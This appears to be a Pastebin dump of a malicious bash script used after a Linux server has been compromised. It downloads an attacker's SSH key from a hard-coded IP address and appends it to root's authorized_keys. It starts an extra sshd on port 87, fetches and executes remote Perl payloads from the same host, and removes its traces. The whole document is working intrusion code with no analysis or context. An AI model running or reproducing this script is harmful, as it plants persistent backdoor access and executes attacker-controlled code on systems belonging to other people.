Advertisement
Guest User

wp2

a guest
Dec 9th, 2016
102
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.60 KB | None | 0 0
  1. #!/bin/bash
  2. rm -rf /tmp/.1
  3. rm -rf /tmp/.2
  4. rm -rf /tmp/.0
  5. rm -rf /tmp/r
  6. rm -rf /tmp/s
  7. mkdir /root/.ssh
  8. wget -O /root/.ssh/kid http://178.18.24.165/ssh/kid
  9. cat /root/.ssh/kid >> /root/.ssh/authorized_keys
  10. rm -rf /root/.ssh/kid*
  11. #killall -9 php
  12. #killall -9 perl
  13. #killall -9 pnscan
  14. mkdir /tmp/.01
  15. /usr/sbin/sshd -p 87
  16. curl -o /tmp/.01/ix http://178.18.24.165/ix
  17. wget -O /tmp/.01/ix http://178.18.24.165/ix
  18. wget -O /tmp/.01/ix1 http://178.18.24.165/ix1
  19. curl -o /tmp/.01/ix1 http://178.18.24.165/ix1
  20. chmod 775 /tmp/.01/ix
  21. chmod 775 /tmp/.01/ix1
  22. perl /tmp/.01/ix
  23. perl /tmp/.01/ix1
  24. rm -rf /tmp/.01
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement